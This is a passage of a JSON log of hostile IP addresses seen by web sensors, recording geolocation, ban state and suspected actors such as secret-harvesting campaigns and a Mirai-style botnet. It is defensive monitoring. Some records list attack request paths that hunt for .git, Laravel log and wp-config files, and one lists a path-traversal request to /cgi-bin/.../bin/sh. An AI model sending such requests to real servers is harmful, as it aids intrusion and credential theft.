   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.31.206.252",
   "country": "United States",
   "cc": "US",
   "city": "Council Bluffs",
   "lat": 41.2619,
   "lon": -95.8608,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "252.206.31.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:01:00+02:00",
   "last_seen": "2026-10-04T21:01:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.32.83.153",
   "country": "Germany",
   "cc": "DE",
   "city": "Berlin",
   "lat": 52.52,
   "lon": 13.405,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "153.83.32.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:29:00+02:00",
   "last_seen": "2026-10-05T01:29:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.34.217.140",
   "country": "Indonesia",
   "cc": "ID",
   "city": "Jakarta",
   "lat": -6.20876,
   "lon": 106.846,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "140.217.34.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T18:02:00+02:00",
   "last_seen": "2026-10-04T18:02:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/.git/config"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.39.67.13",
   "country": "United Kingdom",
   "cc": "GB",
   "city": "London",
   "lat": 51.5134,
   "lon": -0.0890675,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "13.67.39.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:07:00+02:00",
   "last_seen": "2026-10-05T01:07:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.64.237.210",
   "country": "South Korea",
   "cc": "KR",
   "city": "Yongsan-dong",
   "lat": 37.5503,
   "lon": 126.997,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "210.237.64.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T22:56:00+02:00",
   "last_seen": "2026-10-04T22:56:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.65.72.219",
   "country": "Switzerland",
   "cc": "CH",
   "city": "Zurich",
   "lat": 47.3769,
   "lon": 8.54169,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "219.72.65.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T23:51:00+02:00",
   "last_seen": "2026-10-04T23:51:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.75.105.13",
   "country": "United States",
   "cc": "US",
   "city": "North Charleston",
   "lat": 32.8769,
   "lon": -80.0114,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "13.105.75.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:39:00+02:00",
   "last_seen": "2026-10-04T21:39:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.77.137.207",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "207.137.77.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T05:10:00+02:00",
   "last_seen": "2026-10-05T05:10:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "35.222.122.52",
   "country": "United States",
   "cc": "US",
   "city": "Council Bluffs",
   "lat": 41.2619,
   "lon": -95.8608,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "52.122.222.35.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:09:00+02:00",
   "last_seen": "2026-10-04T21:09:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-05"
   ]
  },
  {
   "ip": "35.225.33.58",
   "country": "United States",
   "cc": "US",
   "city": "Council Bluffs",
   "lat": 41.2619,
   "lon": -95.8608,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "58.33.225.35.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:47:00+02:00",
   "last_seen": "2026-10-04T21:47:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "35.234.7.208",
   "country": "Taiwan",
   "cc": "TW",
   "city": "Taoyuan",
   "lat": 25.0797,
   "lon": 121.234,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "208.7.234.35.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T19:58:00+02:00",
   "last_seen": "2026-10-04T19:58:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "45.138.12.16",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T20:12:00+02:00",
   "last_seen": "2026-10-04T20:12:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.138.12.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "7 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "45.138.12.26",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T00:56:00+02:00",
   "last_seen": "2026-10-05T00:56:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "7 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "45.138.12.51",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T23:10:00+02:00",
   "last_seen": "2026-10-04T23:10:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "7 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "45.138.12.9",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T04:05:00+02:00",
   "last_seen": "2026-10-05T04:05:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "7 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-05"
   ]
  },
  {
   "ip": "45.148.10.5",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T02:19:00+02:00",
   "last_seen": "2026-10-05T02:19:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "45.153.102.164",
   "country": "Ireland",
   "cc": "IE",
   "city": "Bagenalstown",
   "lat": 52.7007,
   "lon": -6.95706,
   "asn": 203020,
   "org": "HostRoyale Technologies Pvt Ltd",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T18:58:00+02:00",
   "last_seen": "2026-10-04T18:58:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "45.156.87.131",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 197170,
   "org": "TechTies Inc.",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:18:00+02:00",
   "last_seen": "2026-10-05T01:18:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "46.151.182.93",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 36680,
   "org": "Netiface LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:41:00+02:00",
   "last_seen": "2026-10-05T01:41:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "64.62.156.172",
   "country": "United States",
   "cc": "US",
   "city": "Pleasanton",
   "lat": 37.6951,
   "lon": -121.9,
   "asn": 6939,
   "org": "Hurricane Electric LLC",
   "ptr": "scan-85-0.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T05:30:00+02:00",
   "last_seen": "2026-10-05T05:30:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "firehol-level1",
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS scan-85-0.shadowserver.io"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "65.49.1.142",
   "country": "United States",
   "cc": "US",
   "city": "Pleasanton",
   "lat": 37.6951,
   "lon": -121.9,
   "asn": 6939,
   "org": "Hurricane Electric LLC",
   "ptr": "scan-70-00.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T02:47:00+02:00",
   "last_seen": "2026-10-05T02:47:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "firehol-level1",
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS scan-70-00.shadowserver.io"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "66.218.236.8",
   "country": "United States",
   "cc": "US",
   "city": "Clever",
   "lat": 37.0303,
   "lon": -93.473,
   "asn": 11976,
   "org": "Fidelity Communication International Inc.",
   "ptr": "ip-66-218-236-8.marylandheights.ip.cablemo.net",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T04:35:00+02:00",
   "last_seen": "2026-10-05T04:35:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "71.70.231.156",
   "country": "United States",
   "cc": "US",
   "city": "Half Moon",
   "lat": 34.826,
   "lon": -77.4594,
   "asn": 11426,
   "org": "Charter Communications Inc",
   "ptr": "syn-071-070-231-156.res.spectrum.com",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T23:43:00+02:00",
   "last_seen": "2026-10-04T23:43:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "8.234.127.199",
   "country": "India",
   "cc": "IN",
   "city": "Mumbai",
   "lat": 18.9582,
   "lon": 72.832,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "199.127.234.8.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T20:57:00+02:00",
   "last_seen": "2026-10-04T20:57:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "81.171.72.135",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Haarlem (Oude Stad)",
   "lat": 52.3894,
   "lon": 4.63245,
   "asn": 34343,
   "org": "Eweka Internet Services B.V.",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:36:00+02:00",
   "last_seen": "2026-10-04T21:36:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "cluster:81.171.72.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "hunts for .env, VCS or credential files",
     "2 addresses from 81.171.72.0/24 (AS34343) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "81.171.72.93",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Haarlem (Oude Stad)",
   "lat": 52.3894,
   "lon": 4.63245,
   "asn": 34343,
   "org": "Eweka Internet Services B.V.",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:18:00+02:00",
   "last_seen": "2026-10-04T21:18:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "cluster:81.171.72.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "hunts for .env, VCS or credential files",
     "2 addresses from 81.171.72.0/24 (AS34343) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "85.204.70.112",
   "country": "France",
   "cc": "FR",
   "city": "Paris",
   "lat": 48.8575,
   "lon": 2.35138,
   "asn": 25369,
   "org": "Hydra Communications Ltd",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T23:00:00+02:00",
   "last_seen": "2026-10-04T23:00:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "89.126.211.166",
   "country": "Uzbekistan",
   "cc": "UZ",
   "city": "Tashkent",
   "lat": 41.2995,
   "lon": 69.2401,
   "asn": 202660,
   "org": "\"Uzbektelekom\" Joint Stock Company",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T23:18:00+02:00",
   "last_seen": "2026-10-04T23:18:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "91.148.244.131",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Haarlem (Oude Stad)",
   "lat": 52.3894,
   "lon": 4.63245,
   "asn": 34343,
   "org": "Eweka Internet Services B.V.",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:17:00+02:00",
   "last_seen": "2026-10-04T21:17:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [
    "/storage/logs/laravel.log"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04",
    "2026-10-05"
   ]
  },
  {
   "ip": "91.148.245.81",
   "country": "Albania",
   "cc": "AL",
   "city": "Tirana",
   "lat": 41.3275,
   "lon": 19.8187,
   "asn": 34343,
   "org": "Eweka Internet Services B.V.",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:25:00+02:00",
   "last_seen": "2026-10-04T21:25:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "93.123.109.101",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T02:17:00+02:00",
   "last_seen": "2026-10-05T02:17:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "94.154.43.135",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3734,
   "lon": 4.89406,
   "asn": 219502,
   "org": "Storm Industries LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T21:21:00+02:00",
   "last_seen": "2026-10-04T21:21:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:94.154.43.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS219502 Storm Industries (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "2 addresses from 94.154.43.0/24 (AS219502) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "94.154.43.146",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3734,
   "lon": 4.89406,
   "asn": 219502,
   "org": "Storm Industries LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T02:23:00+02:00",
   "last_seen": "2026-10-05T02:23:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:94.154.43.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS219502 Storm Industries (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "2 addresses from 94.154.43.0/24 (AS219502) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "95.168.180.75",
   "country": "United Kingdom",
   "cc": "GB",
   "city": "London",
   "lat": 51.515,
   "lon": -0.0823869,
   "asn": 205544,
   "org": "LEASEWEB UK LIMITED",
   "ptr": null,
   "types": [
    "secret-probe",
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T20:18:00+02:00",
   "last_seen": "2026-10-04T20:18:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/wp-config.php.txt"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "95.173.222.8",
   "country": "France",
   "cc": "FR",
   "city": "Paris",
   "lat": 48.8575,
   "lon": 2.35138,
   "asn": 212238,
   "org": "Datacamp Limited",
   "ptr": "unn-95-173-222-8.datapacket.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:04:00+02:00",
   "last_seen": "2026-10-05T01:04:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "134.33.66.210",
   "country": "United States",
